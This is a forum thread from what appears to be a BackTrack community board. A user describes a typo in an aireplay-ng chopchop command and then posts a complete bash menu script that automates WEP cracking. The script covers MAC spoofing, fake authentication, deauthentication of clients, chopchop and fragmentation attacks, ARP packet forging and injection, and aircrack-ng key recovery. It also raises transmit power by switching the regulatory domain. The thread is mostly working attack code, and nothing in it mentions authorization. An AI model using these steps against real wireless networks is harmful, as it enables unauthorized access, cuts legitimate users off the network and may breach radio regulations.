Results 1 to 2 of 2

Thread: Aireplay-ng typo but chop chop still works!

Hybrid View

  1. #1
    Junior Member
    Join Date
    Aug 2007
    Location
    Aussie
    Posts
    25

    Default Aireplay-ng typo but chop chop still works!

    I have been writing an aircrack suite script to streamline most tasks and have been extensivly testing it when I noticed a typo in aireplay-ng Chop Chop no client packet forge.
    The odd thing is that it still works despite the typo, it still creates an XOR file then a packet which when injected generates 100's of iv's per second.

    The typo is:

    aireplay-ng -4 -h 11:11:11:11:11:11 -h 44:44:44:44:44:44 wlan1

    The Mac with the 1's was the AP and the Mac with the 4's was the fake authed client which was the Mac of my interface.

    The typo was in this order where the first -h should have been a -b for the AP, funnier still is that with the typo chop chop worked faster at about 1/4 the time of the correct syntax.

    I'm running BT5, on persistant usb, on I7 laptop with alfa network cards AWUS036H and NH cards.

    I've added the script as a txt file, the typo has been fixed but you can see where it was in option 8.

    Drakedeon
    File allegati File allegati

  2. #2
    Junior Member
    Join Date
    Aug 2007
    Location
    Aussie
    Posts
    25

    Default Re: Aireplay-ng typo but chop chop still works!

    Adding the script.
    Code:
    #!/bin/bash
    echo
    echo
    echo "Aircrack script by Steven Johnson copy right 2011"
    echo
    echo "Ensure this is run from a folder named air on desktop in Gnome"
    echo "or some functions may not work!"
    echo
    echo "Press any key"
    read
    iwconfig
    echo "Enter wireless interface to use in aircrack"
    read inter
    iwconfig $inter mode monitor
    echo "Use CTRL-C to exit airodump"
    echo "Press any key to continue"
    read
    
    airodump-ng $inter
    echo "Copy and paste AP MAC from airodump to use in aircrack"
    echo "Enter AP MAC to use in aircrack: press enter to skip"
    read APMAC
    echo
    echo "Do you want to spoof the mac of a client from airodump? y/n"
    echo
    echo "this interface MAC will then be used in aircrack"
    echo
    echo "Press n to run macchanger for interface:" $inter
    echo
    echo "Enter y or n: "
    read spo
    	if [ $spo = "y" ]; then
    	echo "Copy and paste MAC from airodump above"
    	read YOURMAC
    	ifconfig $inter down
    	macchanger -m $YOURMAC $inter
    	ifconfig $inter up
    fi
    	if [ $spo = "n" ]; then 
    	echo 
    	macchanger -h $inter
    	echo "Enter mode as above, s to show current MAC"
    	read mmd
    	ifconfig $inter down
    	macchanger -$mmd $inter
    	ifconfig $inter up
    	echo "Copy mac and paste interface MAC from above: "
    	read YOURMAC
    	
    fi
    
    
    echo "Enter the SSID to use:  press enter to skip"
    read SSID
    
    fun=xxxx
    
    while [ $fun != "0" ]; do
    echo
    echo "PLEASE SELECT FUNCTION: "
    echo 
    echo "a = Enter access point mac to use " $APMAC
    echo "y = Enter your mac to use         " $YOURMAC
    echo "d = Enter SSID to use             " $SSID
    echo "s = Set interface to use          " $inter
    echo "p = Set power for interface"
    echo
    echo "i = iwconfig inc monitor mode"
    echo "f = ifconfig inc up and down"
    echo "m = Change or list MAC"
    echo "c = Set monitor mode with airmon"
    echo "q = Destroy interfaces"
    echo
    echo "1 = Airodump $inter"
    echo "2 = Airodump $inter on channel"
    echo "3 = Airodump $inter with file save"
    echo "4 = Airodump $inter on channel with file save"
    echo
    echo "5 = Fake Auth set channel first!"
    echo "6 = Aireplay injection for WEP"
    echo "7 = DeAuth client with aireplay"
    echo "8 = No client Packet Forge"
    echo "9 = Simple Packet Forge"
    echo "k = Aircrack"
    echo "0 = Exit"
    
    read fun
    
    if [ $fun = "p" ]; then
    echo
    echo "This will change the transmit power use at own risk!"
    echo "only tested on alfa usb interfaces NO GUARANTEES!"
    echo
    echo "Enter power 1-30 or e to exit"
    read powr
    	if [ $powr = "e" ]; then
    	echo "exiting no change"
    	else 
    	echo "setting power to:" $powr
    	read
    	st=set
    	ifconfig $inter down
    	iw reg $st BO
    	iwconfig $inter txpower $powr
    	ifconfig $inter up
    	iwconfig
    	echo "press any key"
    	read
    	fi	
    fi
    
    if [ $fun = "y" ]; then
    echo
    echo
    echo "Run maccchanger to list or change the interface mac"
    echo
    echo "Copy and paste from macchanger or enter manualy"
    echo
    echo "Enter the MAC you want to use as your MAC:"
    
    read YOURMAC
    fi
    
    
    if [ $fun = "a" ]; then
    echo "tip if you run airodump first you can copy and paste the mac"
    echo "enter the MAC you want to use as the AP MAC:"
    read APMAC
    fi
    
    if [ $fun = "d" ]; then
    echo "tip if you run airodump first you can copy and paste the SSID"
    echo "enter the SSID you want to use:"
    read SSID
    fi
    
    if [ $fun = "s" ]; then
    echo "enter the interface you want to use default wlan1"
    read inter
    fi
    
    if [ $fun = "f" ]; then
    ifconfig
    echo "enter option: "
    echo "e = exit"
    echo "d = take down interface" $inter
    echo "u = take up interface" $inter
    read ino
    	if [ $ino = "d" ]; then
    	ifconfig $inter down
    	ifconfig
    	echo "interface" $inter "should now be down"
    	echo "press any key"
    	read
    	else
    		if [ $ino = "u" ]; then
    		ifconfig $inter up
    		ifconfig
    		echo "interface" $inter "should now be up"
    	echo "press any key"
    	read
    		else
    		echo "exiting"
    		echo
    		fi
    	fi
    fi
    
    if [ $fun = "m" ]; then
    echo
    echo "Macchanger for interface: " $inter
    echo
    
    echo "tip you can copy a MAC from airodump to spoof."
    
    read 
    	macchanger -h
    	echo "enter mode as above: "
    	read mode
    	ifconfig $inter down
    	macchanger -$mode $inter
    	ifconfig $inter up
    	echo "press any key to continue"
    	read
    	
    fi
    
    if [ $fun = "i" ]; then
    iwconfig
    echo
    echo "Enter mode for interface:" $inter
    echo
    echo "1 = managed"
    echo "2 = monitor"
    echo "c = set channel"
    echo "e = exit"
    echo
    read mode
    	if [ $mode = "e" ]; then
    	echo "exiting"
    	else if [ $mode = "1" ]; then
    	ifconfig $inter down
    	iwconfig $inter mode managed
    	ifconfig $inter up
    	iwconfig
    	echo "press any key"
    	read
    	else if [ $mode = "2" ]; then
    	ifconfig $inter down
    	iwconfig $inter mode monitor
    	ifconfig $inter up
    	iwconfig
    	echo "press any key"
    	read
    	else if [ $mode = "c" ]; then
    	echo
    	echo "please enter channel:"
    	read chann
    	iwconfig $inter channel $chann
    	iwconfig
    			
    echo "press any key"
    read 
    fi
    fi
    fi
    fi
    fi
    
    if [ $fun = "q" ]; then
    echo "enter interface to destroy: "
    read desint
    echo "this will destroy interface: " $desint
    echo "press y to continue or n to exit"
    read yornn
    if [ $yornn = "y" ]; then
    airmon-ng stop $desint
    iwconfig
    else if [ $yornn = "n" ]; then
    echo "no change"
    fi
    fi
    fi
    
    if [ $fun = "c" ]; then
    echo "do you want to set the Channel as well?"
    read setchan
    	if [ $setchan = "y" ]; then
    	echo "enter channel 1-11: "
    	read chhh
    	airmon-ng start $inter $chhh
    	echo "interface " $inter " should now be in monitor mode on channel: " $chhh " you may need to change the interface used now if mon# is made: "
    	echo "press any key"
    	read
    	else airmon-ng start $inter
    	echo "interface " $inter "should now be in monitor mode,you may need to change the interface used now if mon# is made"
    	echo "press any key"
    	read
    	fi
    fi
    
    if [ $fun = "1" ]; then
    
    gnome-terminal -e "bash -c 'airodump-ng $inter; read'"
    fi
    
    if [ $fun = "2" ]; then
    echo "enter channel: "
    read chch
    gnome-terminal -e "bash -c 'airodump-ng -c $chch $inter; read'"
    
    fi
    
    if [ $fun = "3" ]; then
    echo "enter Save File Name: "
    read Fname
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'airodump-ng -w /root/Desktop/air/$Fname $inter; read'"
    echo "repeat y/n:"
    read ww
    done
    fi
    
    if [ $fun = "4" ]; then
    echo "enter Save File Name: "
    read Fname
    echo "enter Channel: "
    read Ch
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'airodump-ng -c $Ch -w /root/Desktop/air/$Fname $inter; read'"
    
    echo "repeat y/n:"
    read ww
    done
    fi
    
    if [ $fun = "5" ]; then
    echo "do you want to use Picky Auth Y/N "
    echo
    echo "if you use Picky Auth CTRL C will end both Auth and this script"
    read Pa
    	if [ $Pa = "y" ]; then
    
    	wwww=y
    	while [ $wwww = "y" ]; do
    	gnome-terminal -e "bash -c 'aireplay-ng -1 6000 -o 1 -q 10 -e $SSID -a $APMAC -h $YOURMAC $inter; read'"
    	echo "press Y to repeat or N to return to main menu"
    	read wwww
    	done
    
    	else
    
    	www=y
    	while [ $www = "y" ]; do
    	gnome-terminal -e "bash -c 'aireplay-ng -1 0 -a $APMAC -h $YOURMAC $inter; read'"
    	echo "press Y to repeat or N to retun to main menu"
    	read www
    	done
    	fi
    fi
    
    if [ $fun = "6" ]; then
    
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'aireplay-ng -3 -b $APMAC -h $YOURMAC $inter; read'"
    echo "repeat enter Y or N to return to main menu:"
    read ww
    done
    fi
    
    if [ $fun = "7" ]; then
    echo "stop airodump before copy and paste"
    echo "enter client to be DeAuthed can be copied from airodump"
    
    read Cda
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'aireplay-ng -0 10 -a $APMAC -c $Cda $inter; read'"
    echo "repeat enter Y or N to return to main menu:"
    read ww
    done
    fi
    
    if [ $fun = "8" ]; then
    echo
    echo "your MAC must be same as Fake Auth MAC"
    echo
    echo "do you want to use a previously forged packet y/n"
    read dd
    if [ $dd = "y" ]; then
    
    gnome-terminal -e "bash -c 'aireplay-ng -2 -r /root/Desktop/air/arpr $inter; read'"
    else
    
    echo "ensure packet greater than 68 bytes"
    echo 
    echo "don't use huge packets"
    echo
    echo "use CTRL C to exit"
    echo
    ww=y
    while [ $ww = "y" ]; do
    echo "f=frag   c=chop"
    read forc
    	if [ $forc = "f" ]; then
    	echo "copy .xor file name from next screen before pressing any key to close window"
    	echo "continue press any key"
    	read 
    	gnome-terminal -e "bash -c 'aireplay-ng -5 -b $APMAC -h $YOURMAC $inter; read'"
    	fi
    	if [ $forc = "c" ]; then
    	echo "copy .xor file name from next screen before pressing any key to close window"
    	echo "continue press any key"
    	read 
    	gnome-terminal -e "bash -c 'aireplay-ng -4 -b $APMAC -h $YOURMAC $inter; read'"
    	fi
    echo "enter xor file name: copy and paste from previous window"
    read xor
    packetforge-ng -0 -a $APMAC -h $YOURMAC -k 255.255.255.255 -l 255.255.255.255 -y /root/Desktop/air/$xor -w /root/Desktop/air/arpr
    echo "press any key to inject packet"
    read 
    gnome-terminal -e "bash -c 'aireplay-ng -2 -r /root/Desktop/air/arpr $inter'"
    echo "repeat process y/n: press n to exit then 8 to reinject saved packet"
    read ww
    done
    fi
    fi
    
    if [ $fun = "9" ]; then
    echo
    echo "start intface on right channel"
    echo "Ensure Fake Auth first"
    echo "run airodump-ng to capture replys"
    echo
    echo "press any key to start"
    read
    ww=y
    while [ $ww = "y" ]; do
    gnome-terminal -e "bash -c 'aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b $APMAC -h $YOURMAC $inter'"
    echo "repeat y/n:"
    read ww
    done
    fi
    
    if [ $fun = "k" ]; then
    echo
    echo "1 = Aircrack + PCAP file"
    echo "2 = ssid " $SSID " AP MAC " $APMAC " + PCAP file"
    echo
    read ACT
    echo "enter cap file name, add -01 -02 etc to file save name used in airodump:"
    echo ".cap will be appended"
    echo "keyfile saved in root/Desktop/air/keyfile.txt"
    read Pcap
    	if [ $ACT = "1" ]; then
    	gnome-terminal -e "bash -c 'aircrack-ng -l /root/Desktop/air/keyfile.txt -s /root/Desktop/air/$Pcap.cap; read'"
    	
    	else
    	gnome-terminal -e "bash -c 'aircrack-ng -e $SSID -b $APMAC -l /root/Desktop/air/keyfile.txt -s /root/Desktop/air/$Pcap.cap; read'"
    	fi
    fi
    
    done
    drakedeon

Similar Threads

  1. attack chop chop??'
    By bt4agostino in forum Angolo Wireless
    Replies: 4
    Last Post: 01-07-2010, 07:54 PM
  2. chop chop modified
    By Ironchef305 in forum OLD Newbie Area
    Replies: 0
    Last Post: 08-06-2009, 02:38 PM
  3. Senao packet injection works but aireplay don't
    By justdontgetit in forum OLD Newbie Area
    Replies: 1
    Last Post: 04-29-2008, 10:01 AM
  4. aireplay command works but wont crack
    By fido13uk in forum OLD Newbie Area
    Replies: 11
    Last Post: 03-21-2008, 12:15 AM
  5. Typo when running Metoscan
    By xpleet in forum OLD BT3beta Bugs and Fixes
    Replies: 0
    Last Post: 03-12-2008, 11:34 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •